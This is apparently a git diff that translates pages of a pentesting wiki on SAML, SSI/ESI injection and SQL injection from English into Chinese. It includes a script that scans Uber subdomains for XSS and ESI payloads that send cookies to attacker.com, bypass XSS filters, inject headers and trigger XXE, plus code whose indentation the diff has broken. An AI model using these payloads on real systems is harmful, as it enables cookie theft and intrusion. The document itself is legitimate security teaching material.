 def intercept_and_redirect_saml_response(saml_response, sp_target_url):
-    """
-    Simulate the interception of a SAML Response intended for SP-Legit and its redirection to SP-Target.
+"""
+Simulate the interception of a SAML Response intended for SP-Legit and its redirection to SP-Target.
 
-    Args:
-    - saml_response: The SAML Response intercepted (in string format).
-    - sp_target_url: The URL of the SP-Target to which the SAML Response is redirected.
+Args:
+- saml_response: The SAML Response intercepted (in string format).
+- sp_target_url: The URL of the SP-Target to which the SAML Response is redirected.
 
-    Returns:
-    - status: Success or failure message.
-    """
-    # This is a simplified representation. In a real scenario, additional steps for handling the SAML Response would be required.
-    try:
-        # Code to send the SAML Response to SP-Target would go here
-        return "SAML Response successfully redirected to SP-Target."
-    except Exception as e:
-        return f"Failed to redirect SAML Response: {e}"
+Returns:
+- status: Success or failure message.
+"""
+# This is a simplified representation. In a real scenario, additional steps for handling the SAML Response would be required.
+try:
+# Code to send the SAML Response to SP-Target would go here
+return "SAML Response successfully redirected to SP-Target."
+except Exception as e:
+return f"Failed to redirect SAML Response: {e}"
 ```
+## 登出功能中的XSS
 
-## XSS in Logout functionality
-
-The original research can be accessed through [this link](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/).
-
-During the process of directory brute forcing, a logout page was discovered at:
+原始研究可以通过 [this link](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/) 访问。
 
+在目录暴力破解的过程中，发现了一个登出页面：
 ```
 https://carbon-prototype.uberinternal.com:443/oidauth/logout
 ```
-
-Upon accessing this link, a redirection occurred to:
-
+访问此链接时，发生了重定向到：
 ```
 https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1
 ```
+这揭示了 `base` 参数接受一个 URL。考虑到这一点，出现了将 URL 替换为 `javascript:alert(123);` 的想法，以尝试发起 XSS（跨站脚本）攻击。
 
-This revealed that the `base` parameter accepts a URL. Considering this, the idea emerged to substitute the URL with `javascript:alert(123);` in an attempt to initiate an XSS (Cross-Site Scripting) attack.
+### 大规模利用
 
-### Mass Exploitation
-
-[From this research](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/):
-
-The [**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) tool was used to analyze subdomains of `uberinternal.com` for domains utilizing the same library. Subsequently, a script was developed to target the `oidauth/prompt` page. This script tests for XSS (Cross-Site Scripting) by inputting data and checking if it's reflected in the output. In cases where the input is indeed reflected, the script flags the page as vulnerable.
+[来自这项研究](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)：
 
+[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) 工具被用来分析 `uberinternal.com` 的子域，以查找使用相同库的域。随后，开发了一个脚本来针对 `oidauth/prompt` 页面。该脚本通过输入数据并检查其是否反映在输出中来测试 XSS（跨站脚本）。在输入确实被反映的情况下，脚本将该页面标记为易受攻击。
 ```python
 import requests
 import urllib3
@@ -286,17 +271,16 @@ from colorama import init ,Fore, Back, Style
 init()
 
 with open("/home/fady/uberSAMLOIDAUTH") as urlList:
-            for url in urlList:
-                url2 = url.strip().split("oidauth")[0] + "oidauth/prompt?base=javascript%3Aalert(123)%3B%2F%2FFady&return_to=%2F%3Fopenid_c%3D1520758585.42StPDwQ%3D%3D&splash_disabled=1"
-                request = requests.get(url2, allow_redirects=True,verify=False)
-                doesit = Fore.RED + "no"
-                if ("Fady" in request.content):
-                    doesit = Fore.GREEN + "yes"
-                print(Fore.WHITE + url2)
-                print(Fore.WHITE + "Len : " + str(len(request.content)) + "   Vulnerable : " + doesit)
+for url in urlList:
+url2 = url.strip().split("oidauth")[0] + "oidauth/prompt?base=javascript%3Aalert(123)%3B%2F%2FFady&return_to=%2F%3Fopenid_c%3D1520758585.42StPDwQ%3D%3D&splash_disabled=1"
+request = requests.get(url2, allow_redirects=True,verify=False)
+doesit = Fore.RED + "no"
+if ("Fady" in request.content):
+doesit = Fore.GREEN + "yes"
+print(Fore.WHITE + url2)
+print(Fore.WHITE + "Len : " + str(len(request.content)) + "   Vulnerable : " + doesit)
 ```
-
-## References
+## 参考文献
 
 - [https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)
 - [https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)\\
@@ -304,4 +288,3 @@ with open("/home/fady/uberSAMLOIDAUTH") as urlList:
 - [https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/saml-attacks/saml-basics.md b/src/pentesting-web/saml-attacks/saml-basics.md
index ea4915bd9..cdbe5453b 100644
--- a/src/pentesting-web/saml-attacks/saml-basics.md
+++ b/src/pentesting-web/saml-attacks/saml-basics.md
@@ -1,168 +1,161 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# SAML Overview
+# SAML 概述
 
-**Security Assertion Markup Language (SAML)** enables identity providers (IdP) to be utilized for sending authorization credentials to service providers (SP), facilitating single sign-on (SSO). This approach simplifies the management of multiple logins by allowing a single set of credentials to be used across multiple websites. It leverages XML for standardized communication between IdPs and SPs, linking the authentication of user identity with service authorization.
+**安全断言标记语言 (SAML)** 使身份提供者 (IdP) 能够将授权凭证发送给服务提供者 (SP)，从而实现单点登录 (SSO)。这种方法通过允许在多个网站上使用一组凭证来简化多个登录的管理。它利用 XML 在 IdP 和 SP 之间进行标准化通信，将用户身份的认证与服务授权相连接。
 
-## Comparison between SAML and OAuth
+## SAML 与 OAuth 的比较
 
-- **SAML** is tailored towards providing enterprises with greater control over SSO login security.
-- **OAuth** is designed to be more mobile-friendly, uses JSON, and is a collaborative effort from companies like Google and Twitter.
+- **SAML** 针对企业提供更大的 SSO 登录安全控制。
+- **OAuth** 旨在更适合移动设备，使用 JSON，并且是 Google 和 Twitter 等公司的合作成果。
 
-# SAML Authentication Flow
+# SAML 认证流程
 
-**For further details check the full post from [https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)**. This is a summary:
+**有关更多详细信息，请查看完整帖子 [https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)**。以下是摘要：
 
-The SAML authentication process involves several steps, as illustrated in the schema:
+SAML 认证过程涉及多个步骤，如下图所示：
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/saml-flow.jpg](https://epi052.gitlab.io/notes-to-self/img/saml/saml-flow.jpg)
 
-1. **Resource Access Attempt**: The user tries to access a protected resource.
-2. **SAML Request Generation**: The SP does not recognize the user and generates a SAML Request.
-3. **Redirect to IdP**: The user is redirected to the IdP, with the SAML Request passing through the user's browser.
-4. **IdP Receives Request**: The IdP receives the SAML Request.
-5. **Authentication at IdP**: The IdP authenticates the user.
-6. **User Validation**: The IdP validates the user's legitimacy to access the requested resource.
-7. **SAML Response Creation**: The IdP generates a SAML Response containing necessary assertions.
-8. **Redirect to SP's ACS URL**: The user is redirected to the SP's Assertion Consumer Service (ACS) URL.
-9. **SAML Response Validation**: The ACS validates the SAML Response.
-10. **Resource Access Granted**: Access to the initially requested resource is granted.
+1. **资源访问尝试**：用户尝试访问受保护的资源。
+2. **SAML 请求生成**：SP 无法识别用户并生成 SAML 请求。
+3. **重定向到 IdP**：用户被重定向到 IdP，SAML 请求通过用户的浏览器传递。
+4. **IdP 接收请求**：IdP 接收 SAML 请求。
+5. **在 IdP 进行身份验证**：IdP 对用户进行身份验证。
+6. **用户验证**：IdP 验证用户访问请求资源的合法性。
+7. **SAML 响应创建**：IdP 生成包含必要断言的 SAML 响应。
+8. **重定向到 SP 的 ACS URL**：用户被重定向到 SP 的断言消费者服务 (ACS) URL。
+9. **SAML 响应验证**：ACS 验证 SAML 响应。
+10. **资源访问授权**：授予对最初请求的资源的访问权限。
 
-# SAML Request Example
-
-Consider the scenario where a user requests access to a secure resource at [https://shibdemo-sp1.test.edu/secure/](https://shibdemo-sp1.test.edu/secure/). The SP identifies the lack of authentication and generates a SAML Request:
+# SAML 请求示例
 
+考虑用户请求访问 [https://shibdemo-sp1.test.edu/secure/](https://shibdemo-sp1.test.edu/secure/) 上的安全资源的场景。SP 识别到缺乏身份验证并生成 SAML 请求：
 ```
 GET /secure/ HTTP/1.1
 Host: shibdemo-sp1.test.edu
 ...
 ```
-
-The raw SAML Request looks like this:
-
+原始 SAML 请求如下：
 ```xml
 <?xml version="1.0"?>
 <samlp:AuthnRequest ...
 </samlp:AuthnRequest>
 ```
+请求的关键元素包括：
 
-Key elements of this request include:
+- **AssertionConsumerServiceURL**：指定 IdP 应该在身份验证后将 SAML 响应发送到的位置。
+- **Destination**：请求发送到的 IdP 地址。
+- **ProtocolBinding**：定义 SAML 协议消息的传输方法。
+- **saml:Issuer**：标识发起请求的实体。
 
-- **AssertionConsumerServiceURL**: Specifies where the IdP should send the SAML Response post-authentication.
-- **Destination**: The IdP's address to which the request is sent.
-- **ProtocolBinding**: Defines the transmission method of SAML protocol messages.
-- **saml:Issuer**: Identifies the entity that initiated the request.
+在 SAML 请求生成后，SP 以 **302 重定向** 响应，指示浏览器将 SAML 请求编码在 HTTP 响应的 **Location** 头中发送到 IdP。**RelayState** 参数在整个事务中维护状态信息，确保 SP 在接收到 SAML 响应时识别初始资源请求。**SAMLRequest** 参数是原始 XML 片段的压缩和编码版本，使用 Deflate 压缩和 base64 编码。
 
-Following the SAML Request generation, the SP responds with a **302 redirect**, directing the browser to the IdP with the SAML Request encoded in the HTTP response's **Location** header. The **RelayState** parameter maintains the state information throughout the transaction, ensuring the SP recognizes the initial resource request upon receiving the SAML Response. The **SAMLRequest** parameter is a compressed and encoded version of the raw XML snippet, utilizing Deflate compression and base64 encoding.
+# SAML 响应示例
 
-# SAML Response Example
+您可以在 [这里找到完整的 SAML 响应](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)。响应的关键组件包括：
 
-You can find a [full SAML response here](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/). The key components of the response include:
+- **ds:Signature**：此部分是 XML 签名，确保断言发起者的完整性和真实性。示例中的 SAML 响应包含两个 `ds:Signature` 元素，一个用于消息，另一个用于断言。
+- **saml:Assertion**：此部分包含有关用户身份的信息以及可能的其他属性。
+- **saml:Subject**：指定断言中所有语句的主要主题。
+- **saml:StatusCode**：表示对相应请求的操作状态。
+- **saml:Conditions**：详细说明断言的有效时间和指定的服务提供者等条件。
+- **saml:AuthnStatement**：确认 IdP 已对断言的主题进行身份验证。
+- **saml:AttributeStatement**：包含描述断言主题的属性。
 
-- **ds:Signature**: This section, an XML Signature, ensures the integrity and authenticity of the issuer of the assertion. The SAML response in the example contains two `ds:Signature` elements, one for the message and the other for the assertion.
-- **saml:Assertion**: This part holds information about the user's identity and possibly other attributes.
-- **saml:Subject**: It specifies the principal subject of all the statements in the assertion.
-- **saml:StatusCode**: Represents the status of the operation in response to the corresponding request.
-- **saml:Conditions**: Details conditions like the validity timing of the Assertion and the specified Service Provider.
-- **saml:AuthnStatement**: Confirms that the IdP authenticated the subject of the Assertion.
-- **saml:AttributeStatement**: Contains attributes describing the subject of the Assertion.
+在 SAML 响应之后，过程包括从 IdP 的 302 重定向。这导致对服务提供者的断言消费者服务（ACS）URL 的 POST 请求。POST 请求包括 `RelayState` 和 `SAMLResponse` 参数。ACS 负责处理和验证 SAML 响应。
 
-Following the SAML Response, the process includes a 302 redirect from the IdP. This leads to a POST request to the Service Provider's Assertion Consumer Service (ACS) URL. The POST request includes `RelayState` and `SAMLResponse` parameters. The ACS is responsible for processing and validating the SAML Response.
+在接收到 POST 请求并验证 SAML 响应后，用户最初请求的受保护资源将被授予访问权限。这通过对 `/secure/` 端点的 `GET` 请求和 `200 OK` 响应来说明，指示成功访问资源。
 
-After the POST request is received and the SAML Response is validated, access is granted to the protected resource initially requested by the user. This is illustrated with a `GET` request to the `/secure/` endpoint and a `200 OK` response, indicating successful access to the resource.
+# XML 签名
 
-# XML Signatures
+XML 签名是多功能的，可以对整个 XML 树或其中的特定元素进行签名。它们可以应用于任何 XML 对象，而不仅仅是响应元素。以下是 XML 签名的关键类型：
 
-XML Signatures are versatile, capable of signing an entire XML tree or specific elements within it. They can be applied to any XML Object, not just Response elements. Below are the key types of XML Signatures:
-
-### Basic Structure of XML Signature
-
-An XML Signature consists of essential elements as shown:
+### XML 签名的基本结构
 
+XML 签名由基本元素组成，如下所示：
 ```xml
 <Signature>
-  <SignedInfo>
-    <CanonicalizationMethod />
-    <SignatureMethod />
-    <Reference>
-       <Transforms />
-       <DigestMethod />
-       <DigestValue />
-    </Reference>
-    ...
-  </SignedInfo>
-  <SignatureValue />
-  <KeyInfo />
-  <Object />
+<SignedInfo>
+<CanonicalizationMethod />
+<SignatureMethod />
+<Reference>
+<Transforms />
+<DigestMethod />
+<DigestValue />
+</Reference>
+...
+</SignedInfo>
+<SignatureValue />
+<KeyInfo />
+<Object />
 </Signature>
 ```
+每个 `Reference` 元素表示一个特定的被签名资源，通过 URI 属性可以识别。
 
-Each `Reference` element signifies a specific resource being signed, identifiable by the URI attribute.
+### XML 签名的类型
 
-### Types of XML Signatures
+1. **封装签名**：这种类型的签名是其所签名资源的后代，意味着签名包含在与被签名内容相同的 XML 结构中。
 
-1. **Enveloped Signature**: This type of signature is a descendant of the resource it signs, meaning the signature is contained within the same XML structure as the signed content.
+示例：
 
-   Example:
+```xml
+<samlp:Response ... ID="..." ... >
+...
+<ds:Signature>
+<ds:SignedInfo>
+...
+<ds:Reference URI="#...">
+...
+</ds:Reference>
+</ds:SignedInfo>
+</ds:Signature>
+...
+</samlp:Response>
+```
 
-   ```xml
-   <samlp:Response ... ID="..." ... >
-       ...
-       <ds:Signature>
-           <ds:SignedInfo>
-               ...
-               <ds:Reference URI="#...">
-                   ...
-               </ds:Reference>
-           </ds:SignedInfo>
-       </ds:Signature>
-       ...
-   </samlp:Response>
-   ```
+在封装签名中，`ds:Transform` 元素指定它是通过 `enveloped-signature` 算法进行封装的。
 
-   In an enveloped signature, the `ds:Transform` element specifies that it's enveloped through the `enveloped-signature` algorithm.
+2. **封装资源签名**：与封装签名相对，封装资源签名包裹被签名的资源。
 
-2. **Enveloping Signature**: Contrasting with enveloped signatures, enveloping signatures wrap the resource being signed.
+示例：
 
-   Example:
+```xml
+<ds:Signature>
+<ds:SignedInfo>
+...
+<ds:Reference URI="#...">
+...
+</ds:Reference>
+</ds:SignedInfo>
+<samlp:Response ... ID="..." ... >
+...
+</samlp:Response>
+</ds:Signature>
+```
 
-   ```xml
-   <ds:Signature>
-       <ds:SignedInfo>
-           ...
-           <ds:Reference URI="#...">
-               ...
-           </ds:Reference>
-       </ds:SignedInfo>
-       <samlp:Response ... ID="..." ... >
-           ...
-       </samlp:Response>
-   </ds:Signature>
-   ```
+3. **分离签名**：这种类型与其所签名的内容是分开的。签名和内容独立存在，但两者之间保持链接。
 
-3. **Detached Signature**: This type is separate from the content it signs. The signature and the content exist independently, but a link between the two is maintained.
+示例：
 
-   Example:
+```xml
+<samlp:Response ... ID="..." ... >
+...
+</samlp:Response>
+<ds:Signature>
+<ds:SignedInfo>
+...
+<ds:Reference URI="#...">
+...
+</ds:Reference>
+</ds:SignedInfo>
+</ds:Signature>
+```
 
-   ```xml
-   <samlp:Response ... ID="..." ... >
-       ...
-   </samlp:Response>
-   <ds:Signature>
-       <ds:SignedInfo>
-           ...
-           <ds:Reference URI="#...">
-               ...
-           </ds:Reference>
-       </ds:SignedInfo>
-   </ds:Signature>
-   ```
+总之，XML 签名提供了灵活的方式来保护 XML 文档，每种类型满足不同的结构和安全需求。
 
-In conclusion, XML Signatures provide flexible ways to secure XML documents, with each type serving different structural and security needs.
-
-## References
+## 参考
 
 - [https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
index eb59391e9..1e3986db7 100644
--- a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
+++ b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
@@ -1,32 +1,29 @@
-# Server Side Inclusion/Edge Side Inclusion Injection
+# 服务器端包含/边缘端包含注入
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Server Side Inclusion Basic Information
+## 服务器端包含基本信息
 
-**(Introduction taken from** [**Apache docs**](https://httpd.apache.org/docs/current/howto/ssi.html)**)**
+**（介绍摘自** [**Apache 文档**](https://httpd.apache.org/docs/current/howto/ssi.html)**）**
 
-SSI (Server Side Includes) are directives that are **placed in HTML pages, and evaluated on the server** while the pages are being served. They let you **add dynamically generated content** to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.\
-For example, you might place a directive into an existing HTML page, such as:
+SSI（服务器端包含）是**放置在 HTML 页面中的指令，并在服务器上评估**，同时页面被提供。它们允许您**向现有 HTML 页面添加动态生成的内容**，而无需通过 CGI 程序或其他动态技术提供整个页面。\
+例如，您可以将指令放入现有 HTML 页面中，例如：
 
 `<!--#echo var="DATE_LOCAL" -->`
 
-And, when the page is served, this fragment will be evaluated and replaced with its value:
+当页面被提供时，这个片段将被评估并替换为其值：
 
 `Tuesday, 15-Jan-2013 19:28:54 EST`
 
-The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time - shown above. But if a majority of your page is being generated at the time that it is served, you need to look for some other solution.
+何时使用 SSI，以及何时让您的页面完全由某个程序生成，通常取决于页面的静态部分有多少，以及每次页面被提供时需要重新计算多少。SSI 是添加小块信息的好方法，例如上面显示的当前时间。但如果您的页面大部分是在提供时生成的，您需要寻找其他解决方案。
 
-You can infer the presence of SSI if the web application uses files with the extension&#x73;**`.shtml`, `.shtm` or `.stm`**, but it's not only the case.
-
-A typical SSI expression has the following format:
+如果 Web 应用程序使用扩展名为**`.shtml`、`.shtm` 或 `.stm`**的文件，您可以推断出 SSI 的存在，但这并不是唯一的情况。
 
+典型的 SSI 表达式具有以下格式：
 ```
 <!--#directive param="value" -->
 ```
-
-### Check
-
+### 检查
 ```javascript
 // Document name
 <!--#echo var="DOCUMENT_NAME" -->
@@ -57,23 +54,19 @@ A typical SSI expression has the following format:
 <!--#set var="name" value="Rich" -->
 
 ```
-
 ## Edge Side Inclusion
 
-There is a problem **caching information or dynamic applications** as part of the content may have **varied** for the next time the content is retrieved. This is what **ESI** is used form, to indicate using ESI tags the **dynamic content that needs to be generated** before sending the cache version.\
-If an **attacker** is able to **inject an ESI tag** inside the cache content, then, he could be able to i**nject arbitrary content** on the document before it's sent to the users.
+存在一个问题，即**缓存信息或动态应用程序**的一部分内容在下次检索时可能会**有所不同**。这就是**ESI**的用途，通过使用ESI标签来指示**需要生成的动态内容**，然后再发送缓存版本。\
+如果**攻击者**能够在缓存内容中**注入一个ESI标签**，那么他就能够在文档发送给用户之前**注入任意内容**。
 
 ### ESI Detection
 
-The following **header** in a response from the server means that the server is using ESI:
-
+以下**头部**在服务器的响应中意味着服务器正在使用ESI：
 ```
 Surrogate-Control: content="ESI/1.0"
 ```
-
-If you can't find this header, the server **might be using ESI anyways**.\
-A **blind exploitation approach can also be used** as a request should arrive to the attackers server:
-
+如果您找不到此头部，服务器**可能仍在使用 ESI**。\
+**盲目利用的方法也可以使用**，因为请求应该到达攻击者的服务器：
 ```javascript
 // Basic detection
 hell<!--esi-->o
@@ -94,36 +87,32 @@ hell<!--esi-->o
 // Valid for Akamai, sends debug information in the response
 <esi:debug/>
 ```
+### ESI 利用
 
-### ESI exploitation
+[GoSecure 创建了](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) 一个表格，以了解我们可以针对不同 ESI 能力软件尝试的可能攻击，具体取决于支持的功能：
 
-[GoSecure created](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) a table to understand possible attacks that we can try against different ESI-capable software, depending on the functionality supported:
+- **Includes**: 支持 `<esi:includes>` 指令
+- **Vars**: 支持 `<esi:vars>` 指令。用于绕过 XSS 过滤器
+- **Cookie**: 文档 cookies 可被 ESI 引擎访问
+- **Upstream Headers Required**: 代理应用程序不会处理 ESI 语句，除非上游应用程序提供头信息
+- **Host Allowlist**: 在这种情况下，ESI 包含仅可能来自允许的服务器主机，使得 SSRF 例如，仅可能针对这些主机
 
-- **Includes**: Supports the `<esi:includes>` directive
-- **Vars**: Supports the `<esi:vars>` directive. Useful for bypassing XSS Filters
-- **Cookie**: Document cookies are accessible to the ESI engine
-- **Upstream Headers Required**: Surrogate applications will not process ESI statements unless the upstream application provides the headers
-- **Host Allowlist**: In this case, ESI includes are only possible from allowed server hosts, making SSRF, for example, only possible against those hosts
-
-|         **Software**         | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
-| :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
-|            Squid3            |     Yes      |   Yes    |     Yes     |              Yes              |         No         |
-|        Varnish Cache         |     Yes      |    No    |     No      |              Yes              |        Yes         |
-|            Fastly            |     Yes      |    No    |     No      |              No               |        Yes         |
-| Akamai ESI Test Server (ETS) |     Yes      |   Yes    |     Yes     |              No               |         No         |
-|          NodeJS esi          |     Yes      |   Yes    |     Yes     |              No               |         No         |
-|        NodeJS nodesi         |     Yes      |    No    |     No      |              No               |      Optional      |
+|         **软件**         | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
+| :----------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
+|            Squid3        |     Yes      |   Yes    |     Yes     |              Yes              |         No         |
+|        Varnish Cache     |     Yes      |    No    |     No      |              Yes              |        Yes         |
+|            Fastly        |     Yes      |    No    |     No      |              No               |        Yes         |
+| Akamai ESI 测试服务器 (ETS) |     Yes      |   Yes    |     Yes     |              No               |         No         |
+|          NodeJS esi      |     Yes      |   Yes    |     Yes     |              No               |         No         |
+|        NodeJS nodesi     |     Yes      |    No    |     No      |              No               |      Optional      |
 
 #### XSS
 
-The following ESI directive will load an arbitrary file inside the response of the server
-
+以下 ESI 指令将在服务器的响应中加载任意文件
 ```xml
 <esi:include src=http://attacker.com/xss.html>
 ```
-
-#### Bypass client XSS protection
-
+#### 绕过客户端 XSS 保护
 ```xml
 x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
 
@@ -131,18 +120,14 @@ Use <!--esi--> to bypass WAFs:
 <scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
 <img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
 ```
+#### 偷取 Cookie
 
-#### Steal Cookie
-
-- Remote steal cookie
-
+- 远程偷取 Cookie
 ```xml
 <esi:include src=http://attacker.com/$(HTTP_COOKIE)>
 <esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
 ```
-
-- Steal cookie HTTP_ONLY with XSS by reflecting it in the response:
-
+- 通过在响应中反射来使用 XSS 偷取 HTTP_ONLY cookie：
 ```bash
 # This will reflect the cookies in the response
 <!--esi $(HTTP_COOKIE) -->
@@ -151,41 +136,31 @@ Use <!--esi--> to bypass WAFs:
 
 # It's possible to put more complex JS code to steal cookies or perform actions
 ```
+#### 私有本地文件
 
-#### Private Local File
-
-Do not confuse this with a "Local File Inclusion":
-
+不要将其与“本地文件包含”混淆：
 ```markup
 <esi:include src="secret.txt">
 ```
-
 #### CRLF
-
 ```markup
 <esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
 ```
-
 #### Open Redirect
 
-The following will add a `Location` header to the response
-
+以下内容将向响应添加一个 `Location` 头部
 ```bash
 <!--esi $add_header('Location','http://attacker.com') -->
 ```
+#### 添加头部
 
-#### Add Header
-
-- Add header in forced request
-
+- 在强制请求中添加头部
 ```xml
 <esi:include src="http://example.com/asdasd">
 <esi:request_header name="User-Agent" value="12345"/>
 </esi:include>
 ```
-
-- Add header in response (useful to bypass "Content-Type: text/json" in a response with XSS)
-
+- 添加响应头（用于绕过带有XSS的“Content-Type: text/json”的响应）
 ```bash
 <!--esi/$add_header('Content-Type','text/html')/-->
 
@@ -193,55 +168,45 @@ The following will add a `Location` header to the response
 
 # Check the number of url_decode to know how many times you can URL encode the value
 ```
-
-#### CRLF in Add header (**CVE-2019-2438)**
-
+#### CRLF 在 Add 头部 (**CVE-2019-2438**)
 ```xml
 <esi:include src="http://example.com/asdasd">
 <esi:request_header name="User-Agent" value="12345
 Host: anotherhost.com"/>
 </esi:include>
 ```
-
 #### Akamai debug
 
-This will send debug information included in the response:
-
+这将发送包含在响应中的调试信息：
 ```xml
 <esi:debug/>
 ```
-
 ### ESI + XSLT = XXE
 
-It's possible to use **`eXtensible Stylesheet Language Transformations (XSLT)`** syntax in ESI just by indicating the param **`dca`** value as **`xslt`**. Which might allow to abuse **XSLT** to create and abuse a XML External Entity vulnerability (XXE):
-
+在 ESI 中使用 **`eXtensible Stylesheet Language Transformations (XSLT)`** 语法是可能的，只需将参数 **`dca`** 的值指示为 **`xslt`**。这可能允许滥用 **XSLT** 来创建和利用 XML 外部实体漏洞 (XXE)：
 ```xml
 <esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
 ```
-
-XSLT file:
-
+XSLT 文件：
 ```xml
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
 <foo>&xxe;</foo>
 ```
-
-Check the XSLT page:
+检查 XSLT 页面：
 
 {{#ref}}
 xslt-server-side-injection-extensible-stylesheet-language-transformations.md
 {{#endref}}
 
-### References
+### 参考文献
 
 - [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
 - [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
 - [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)
 
-## Brute-Force Detection List
+## 暴力破解检测列表
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md
index 9460df72a..7f36e5603 100644
--- a/src/pentesting-web/sql-injection/README.md
+++ b/src/pentesting-web/sql-injection/README.md
@@ -4,20 +4,19 @@
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的事件之一。该大会的 **使命是促进技术知识**，是各个领域技术和网络安全专业人士的热烈交流平台。
 
 {% embed url="https://www.rootedcon.com/" %}
 
-## What is SQL injection?
+## 什么是 SQL 注入？
 
-An **SQL injection** is a security flaw that allows attackers to **interfere with database queries** of an application. This vulnerability can enable attackers to **view**, **modify**, or **delete** data they shouldn't access, including information of other users or any data the application can access. Such actions may result in permanent changes to the application's functionality or content or even compromision of the server or denial of service.
+**SQL 注入** 是一种安全漏洞，允许攻击者 **干扰应用程序的数据库查询**。此漏洞使攻击者能够 **查看**、**修改** 或 **删除** 他们不应访问的数据，包括其他用户的信息或应用程序可以访问的任何数据。这些行为可能导致应用程序功能或内容的永久性更改，甚至可能导致服务器的泄露或拒绝服务。
 
-## Entry point detection
-
-When a site appears to be **vulnerable to SQL injection (SQLi)** due to unusual server responses to SQLi-related inputs, the **first step** is to understand how to **inject data into the query without disrupting it**. This requires identifying the method to **escape from the current context** effectively. These are some useful examples:
+## 入口点检测
 
+当一个网站由于对与 SQLi 相关的输入的异常服务器响应而 **看似易受 SQL 注入 (SQLi)** 攻击时，**第一步** 是了解如何 **在不干扰查询的情况下注入数据**。这需要有效识别 **逃离当前上下文** 的方法。以下是一些有用的示例：
 ```
- [Nothing]
+[Nothing]
 '
 "
 `
